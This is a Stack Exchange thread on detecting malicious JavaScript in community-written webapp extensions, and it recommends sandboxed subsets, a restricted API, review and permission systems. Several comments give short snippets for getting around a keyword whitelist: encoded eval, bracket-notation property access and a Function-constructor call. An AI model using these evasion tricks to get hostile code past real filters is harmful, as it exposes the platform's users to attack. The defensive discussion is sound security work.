How to scan Javascript for malicious code?

Asked Dec 15 '11 at 23:38

Active Feb 22 '19 at 09:45

Viewed 4.5k times

22

We're planning to give the possibility to write community-driven extensions in javascript for our public webapp and let people to customize their instances of the application. The problem is to monitor the quality of extensions.

What would you suggest to automate this process?

Or how to scan Javascript for malicious code?

In a few words we would like to have some service like antivirus that would scan in a real time uploaded extensions for being malicious. And if it detects any suspected code it would generate an alert.

Any hint/advice is welcome! Thank you.

edited Oct 13 '17 at 14:03

asked Dec 15 '11 at 23:38

Igor

587
2
5
11

4

I don't think this is as easy as you believe it is. Javascript can't do anything malicious by itself and there's no "virus" to be detected. Javascript is the primary vector for [Cross Site Scripting attacks](http://en.wikipedia.org/wiki/Cross-site_scripting), but it would be better to secure your webapp against this rather than to trust extensions. It's your webapp that's vulnerable and you'd need a good understanding of the webapp in order to analyze extensions for their security. – slhck Dec 15 '11 at 23:56
4

This is pretty much impossible to do at such a generic level without knowing a ton about the site, how it's structured, what is public and what is private and what needs to be protected on the site. Among other things, you will want to make sure the extentions are structured such that an extension that one user deploys can't get access to any data from another user's site or trick other users into doing something. – Dec 15 '11 at 23:57
1

@jfriend00, the most common use case for JavaScript is web applications which are executed in the sandbox of the browser. Igor, however, mentions extensions, which implies that this is not just a normal web page. The JavaScript in Firefox extensions, to give one example, has full access to the computer, they can read and write any file and execute any program, the operating system user has access to. – Hendrik Brummermann Dec 16 '11 at 08:00

5 Answers5

9

One approach would be to define a safe API for the extensions to use, by declaring objects implementing that API in the scope of execution for the extension. Then require the extension code to be written in a sandboxed version of Javascript, so the extension code can invoke only the safe API methods you defined and nothing more.

So, if your API consisted of an object stored in a variable api, then the code:

var x = api.frob();
x.bar();

would be allowed extension code, because api is part of your safe API, and the safe Javascript variants allow you to invoke the API that is exposed to extension code.

However, the code:

document.createElement("img");

would not be allowed, because document is not part of your safe API.

In designing the API, make sure that no exposed object has properties that could be used maliciously. To give limited access to a resource, use closures to make functions that privately reference the resource.

There are a number of projects out there that have defined a sandboxed version of Javascript you could use for this purpose: SES, Caja, ADsafe, FBJS, and others. SES and Caja let developers write code with the fewest restrictions: it feels a lot like just writing Javascript, with a few minor restrictions (e.g., no eval, no with). ADsafe and FBJS require the developer to learn a variant of Javascript. SES, ADsafe, and FBJS have the best performance. SES requires support from a very recent Javascript engine, and thus is not compatible with some older web browsers. If the extension code will be executed on the server side, then SES may be the best bet, because you can ensure your Javascript engine is up-to-date. If the extension is going to be executed on the user's browser, you might consider Caja if the extension is not performance-critical, or ADsafe/FBJS if it is.

edited Dec 21 '11 at 23:01

D.W.

98,420
30
267
572

answered Dec 16 '11 at 19:29

JGWeissman

271
1
6

Scanning for such syntactic references will never work. There are too many ways to evade a scan. e.g., `eval(decodeURI("%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%69%6D%67%22%29"))`. This is just one example; there are a million more like it. – D.W. Dec 18 '11 at 23:03
@D.W. The proposed method is to build a whitelist of approved calls. A javascript instruction beginning with "eval" would not be allowed because "eval" is not part of the safe API. – JGWeissman Dec 19 '11 at 19:39
4

This problem is much harder than most people realize. Example: after `function f() { return this; }; var w = f();`, `w` points to the `window` object. Then, `w["document"]["createElement"]("img")` invokes `document.createElement("img")`. Try it and see! Whitelisting is not enough to save you from that kind of attack. Restricting malicious Javascript is a very hard problem: just scanning Javascript for references and checking them on a whitelist is not enough. See, e.g., Caja, MS WebSandbox, ADsafe, and other systems for examples of this done right (but beware that they are complex). – D.W. Dec 20 '11 at 08:34
@D.W. You make a convincing argument for not whitelisting the keyword "this" (you can get equivalent functionality with closures), and to consider carefully which keywords to allow. I would go with just "var" and "function". – JGWeissman Dec 20 '11 at 18:20
You seem confident you have the answer, but a friendly note of advice: this problem is much harder than you seem to realize. Excluding `this` from the whitelist is (1) cheesy, because it prevents object-oriented programming, (2) not enough for security anyway, as there are ways to obtain the `window` object without ever using the `this` keyword: e.g., `var w = []["sort"]["call"]();`. There are tons more like this. How many more times would you like to ride the merry-go-round? P.S. Prohibiting all keywords other than `this` and `function` is a non-starter; you can't write useful code that way. – D.W. Dec 20 '11 at 20:58
A general note: Anyone can build a security mechanism that defeats all the attacks they can think of it. The hard part is to defeat the ones you haven't thought of. – D.W. Dec 20 '11 at 21:08
P.S. I'm reminded of a story where an amateur codemaker invented a code he thought it was great and took it to an experienced codebreaker, who promptly broke it. The amateur tweaked his scheme to stop that particular attack, took it back, and it was broken again. After a few rounds, the codebreaker got fed up, handed him three envelopes, said "each envelope has one attack. Don't come back until you've found all three yourself." Lesson: repeatedly patching holes until you can't spot any more is not a great foundation for a secure system. – D.W. Dec 20 '11 at 21:09
1

@D.W. I tried running a script with "var w = []["sort"]["call"]();" and some variations in Firefox and IE. It errored out. Your parable doesn't seem to fit here well. You proposed one exploit that doesn't work against my scheme as presented, one that prompted me to clarify how to decide what goes in a whitelist, and then one that doesn't work at all. – JGWeissman Dec 20 '11 at 23:11
Perhaps `[]["sort"]["call"]()` is browser-dependent; it works for me. There are many more. Another fun one: `((function () {})["constructor"])("alert(5)")()`. The general point is that absence of evidence of insecurity is not evidence of security. Just because you are unaware of an exploit doesn't mean that your approach is secure or robust. – D.W. Dec 20 '11 at 23:44
1

@D.W. OK, that one works, and I am convinced that my approach is not feasible. – JGWeissman Dec 21 '11 at 00:18
1

OK, thanks for your patience with me. I do think we can save the overall approach, if we shift to a more secure technology for Javascript subsetting. I would suggest (1) require extensions be written in a sandboxed Javascript subset, like SES, Caja, FBJS, ADSafe, or the like, and (2) define a safe API for extensions to use, and expose only that API. The change in your answer has to do with (1), but (2) can stay as it is. What do you think? – D.W. Dec 21 '11 at 17:42
@D.W. Caja looks like a much more advanced version of my approach, as near as I can tell. (The others may be as well, I haven't looked closely.) With Google doing the work of defining the safe subset of Javascript, I wouldn't advise anyone to reinvent that wheel. So it remains to define the safe API within that framework of what an extension in a particular web application is allowed to do. – JGWeissman Dec 21 '11 at 18:53
1

Side note in the discussion, []["sort"]["call"]() will not work on JS strict mode, because calling a method as a function does not default "this" to the global object, it leaves it undefined. This should throw a "cannot convert undefined to object" on Firefox – flpmor Dec 23 '11 at 14:56
@fms Yes, that explains it. I was using strict mode where it did not work. – JGWeissman Dec 23 '11 at 17:43

6

(Do not attempt to roll out your own sanitation scheme. Given the complexity of JavaScipt, home-cooked sanitation would probably be insecure. Use an existing solution that has already been well vetted.)

Google's Caja Compiler is a tool for making third party HTML, CSS and JavaScript safe to embed in your website.

If I remember correctly, it was used for iGoogle, because just separating untrusted code into iframes still had shortcomings.

edited Mar 14 '14 at 19:22

answered Jun 07 '12 at 21:55

700 Software

13,807
3
52
82

6

There is no good way to scan Javascript for malicious code. You can't do it. The problem is that there are too many ways a malicious/rogue developer can hide malicious stuff in their code, and you'll never be able to detect it all.

Anti-virus is not helpful here. You need to understand a little bit about how anti-virus software works and its limitations. Roughly speaking, here's how it works. If the anti-virus company detects a virus infecting many machines, then they analyze the virus, identify a signature of the virus (e.g., an excerpt of its code), and build this into their engine. Thereafter, if your machine gets infected by a copy of that particular copy (the exact same one they analyzed), then the anti-virus software will detect its presence through this signature. As a result, anti-virus software is useful primarily only against viruses that have spread widely. Existing anti-virus software is not going to detect malicious code in a rogue extension for your webapp. Anti-virus software has some uses, but it is basically useless for your particular scenario.

You need to accept that this is not a problem you can solve by scanning code. So, you'll need to consider some other approach. What are your options? There are several:

You could give up and embrace the chaos. You could create a public site for extensions, allow users to rate extensions, and post/view reviews. This way, if a developer posts a low-quality extension that is buggy or crashes things, users who notice it can post a negative review. (Of course, if the developer is malicious and posts an evil extension, there's no guarantee that anyone will ever notice -- if you're lucky, maybe some user will happen to notice the malicious code somehow and report it to you, but it's just as likely that no one will ever notice. That's the risk you take.)

This is known as having an open extension system. See, e.g., the Android Market or the Google Chrome Extension Gallery or Userscripts.org (a Greasemonkey extension site).
You could institute some kind of review system, where experts review each extension before it is posted (or shortly after it is posted) on the public extension site. If you just want to catch quality problems, it might be enough to have the experts install the extension and test it, and perhaps run a code quality bug-finding tool to scan for common problems. If you also want to catch malicious extensions, the reviewer will need to be a developer who is capable of reading code and who reads through the extension line-by-line; this is extremely tedious and time-consuming, but there's not really any better option.

This is known as having a curated extension system. See, e.g., the Apple iOS App Store or the Firefox extension site (addons.mozilla.org) for some examples, though I believe they focus only on code quality and not on detecting malice.

Whichever approach you take, there is a significant advantage to extensions served from a single public extension site, which hosts the authoritative version of the extension. You might want to take various steps to encourage users to install extensions from that site and discourage them from installing extensions from other sites (e.g., by default disable installing extensions from other sources and require the user to click to authorize any other domain they want to install from, like Firefox does). What's the benefit? The benefit is that this ensures that all of your users get the same copy of the extension. It prevents attacks, e.g., where a malicious web site uses some script to check whether the user's browser version and where the user is coming from, and based upon that, decide whether to serve malicious code or legitimate code -- those kinds of attacks make it harder to detect malice, so stopping them is a good thing. It also ensures that users get the benefits of reviews and ratings.

You should also consider carefully which APIs are exposed to extensions and which are not. You might consider exposing only a subset of the API to extensions, so that extensions are inherently limited in what they can do, as a way to limit the damage. For instance, the Chrome browser allows extensions to interact with the web page's DOM and the web site, but extensions are not allowed to execute native code (e.g., install and run a .exe). This kind of thing helps security. Alternatively, you could provide a basic API which avoids the highest-risk APIs, and then require any extension which requires access to more than the basic API must get approval from the moderators first before they can be posted on the public site.

Another possible defense against malicious extensions is to introduce a permission system. You identify a set of permissions. The extension is required to include a manifest, which specifies the set of permissions it needs. When the user installs the permission, the system should show the user the set of permissions the extension is requesting and what those permissions imply (e.g., what security/privacy risks they pose, what access they grant to the extension), allowing the user to either approve the permissions and proceed with installation or to reject the permissions and cancel installation. This gives users more control and visibility over extensions, reduces the risks of buggy extensions (because the consequences of a security vulnerability in an extension are now limited to only the permissions it requested, not all permissions), and may make malicious extensions more apparent (because they need to request certain permissions to do harm). See, e.g., Android applications or Google Chrome extensions for an example of this sort of thing.

edited Jun 16 '20 at 09:49

Community

1

answered Dec 18 '11 at 23:38

D.W.

98,420
30
267
572

2

I don't know if this can be automated easily, and I agree with @jfriend00 and @slhck as to the general difficulty of successfully screening these Javascripts. That being said, there is at least one tool I know of that attempts to detect malicious scripts.

This tool is Wepawet, which is operated by the University of California at Santa Barbara. It is described thus:

Wepawet is a framework for the analysis of web-based threats. Wepawet is able to determine if visiting a web page would lead to an attempt to compromise the visitor's environment.

answered Dec 16 '11 at 03:10

Andrew Lambert

588
4
12

0

IBM Appscan has a static code analysis module called "JavaScript Security Analyzer (JSA)". It is definitely NOT free, but it provides feedback on the security implications of Javascript code.

Aside from the JSA, I am unaware of any other static code analysis tools to look for security concerns, but I would love to learn about more. Maybe if JLint/JHint added some security functions?

answered Dec 16 '11 at 14:53

schroeder

123,438
55
284
319

2

This is not what JSA is designed for. JSA is designed to help an honest-but-fallible developer find inadvertent security bugs in their own code. It is not designed to prevent malicious code in Javascript written by a dishonest/rogue developer. There are many, many ways that a dishonest developer could introduce malicious code that JSA could not detect. – D.W. Dec 18 '11 at 23:04
I totally agree that the JSA is not designed to be a total solution to review random code from the public, but it IS a static scanner that deals with security implications. And, as far as I know, the only one on the market. That being said, it becomes an option for the OP who wanted something "like an antivirus", even though he should consider another strategy entirely. --- Is my answer still worth a down-vote? – schroeder Dec 19 '11 at 15:20